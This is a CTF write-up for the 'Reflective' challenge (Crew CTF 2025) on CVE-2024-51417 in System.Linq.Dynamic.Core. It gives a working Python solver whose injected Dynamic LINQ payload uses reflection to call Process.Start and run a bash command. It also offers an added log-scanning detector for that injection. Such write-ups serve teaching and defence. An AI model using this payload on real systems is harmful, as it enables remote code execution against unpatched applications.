CVE-2024-51417: System.Linq.Dynamic.Core RCE (Reflective)
| Event Name | Crew CTF 2025 |
| GitHub URL | - |
| Challenge Name | Reflective |
| Solves |
References
CVE-2024-51417 is a vulnerability in System.Linq.Dynamic.Core that allows remote access to properties on reflection types and static properties/fields, leading to RCE.
Solver
```python
import httpx

# Base URL of the challenge instance
url = "http://localhost:8080"

# Expression sent in the search parameter; COMMAND is substituted below
payload = r'") && "".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredMethods.Where(it.Name == "CreateInstanceAndUnwrap").First().Invoke("".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredProperties.Where(it.name == "CurrentDomain").First().GetValue(null), "System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089; System.Diagnostics.Process".Split(";".ToCharArray())).GetType().Assembly.DefinedTypes.Where(it.Name == "Process").First().DeclaredMethods.Where(it.name == "Start").Take(3).Last().Invoke(null, "/bin/bash;-c \"COMMAND\"".Split(";".ToCharArray())).GetType().ToString() == ("'
command = "id"
payload = payload.replace("COMMAND", command)

# The payload is passed as the search query parameter of /Notes
r = httpx.get(f"{url}/Notes", params=dict(search=payload))
print(r.text)
```
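Detection logic for the request the solver sends, as an added example that is not part of the original write-up: it URL-decodes the `search` parameter of `/Notes` requests in an access log and flags a string-literal breakout and the reflection member names seen in the payload. The log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Reflection members taken from the payload on this page; a note search
# term has no reason to reach for them.
REFLECTION_MEMBERS = ("GetType", "Assembly", "DefinedTypes", "DeclaredMethods",
                      "DeclaredProperties", "CreateInstanceAndUnwrap", "Invoke")
# The payload mixes it.Name and it.name, so match member names case-insensitively.
MEMBER_RE = re.compile(r"\.\s*(%s)\b" % "|".join(REFLECTION_MEMBERS), re.I)
# A quote that closes the string literal, then ")" and a boolean operator.
BREAKOUT_RE = re.compile(r'"\s*\)\s*(?:&&|\|\||and\b|or\b)', re.I)
# Assumed log format: common/combined access log with the request line quoted.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def inspect_search(value):
    """Return the reasons a decoded search value looks like expression injection."""
    reasons = []
    if BREAKOUT_RE.search(value):
        reasons.append("string-literal breakout")
    members = sorted({m.group(1).lower() for m in MEMBER_RE.finditer(value)})
    if members:
        reasons.append("reflection members: " + ",".join(members))
    return reasons

def scan(lines, path="/Notes", param="search"):
    """Return (line number, reasons) for requests whose search value is suspicious."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        target = urlsplit(match.group("target")) if match else None
        if target is None or target.path != path:
            continue
        for value in parse_qs(target.query).get(param, []):
            reasons = inspect_search(value)
            if reasons:
                findings.append((number, reasons))
    return findings

def _sample(search):  # constructed log line, not captured traffic
    return ('203.0.113.7 - - [01/Jan/2025:00:00:00 +0000] '
            '"GET /Notes?search=%s HTTP/1.1" 200 512' % quote(search))
SAMPLE_LOG = [
    _sample("groceries"),
    _sample('meeting "notes" (draft)'),
    _sample('") && "".GetType().Assembly.DefinedTypes.Where(it.name == "X").First() == ("'),
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Treat a hit as a triage signal: an ordinary search term can contain a token such as `.Assembly` and still be harmless.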